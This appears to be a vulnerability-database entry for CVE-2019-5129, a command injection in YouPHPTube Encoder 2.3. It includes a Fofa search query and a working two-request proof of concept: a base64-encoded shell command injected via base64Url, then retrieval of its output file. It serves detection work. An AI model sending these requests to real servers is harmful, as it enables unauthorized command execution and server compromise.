🔙 목록으로 돌아가기

CVE-2019-5129: YouPHPTube Encoder 2.3 - Command Injection

TitleYouPHPTube Encoder 2.3 - Command Injection
Authorpussycat0x
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary system commands through command injection, leading to complete server compromise and potential access to all media content.
RemediationUpgrade to YouPHPTube Encoder version 2.4 or later, or apply vendor-provided security patches.
CVSS Score9.8
EPSS Score0.9306
CVE IDCVE-2019-5129
CWE IDCWE-78
Fofa Queryicon_hash="-276846707"
Tags cve cve2019 youphptube rce encoder vkev vuln

🔍 Vulnerability Description

Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.

🌐 HTTP Request

GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gQ0pkUS50eHRg&format=jpg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
GET /objects/CJdQ.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-5129.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-5129.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A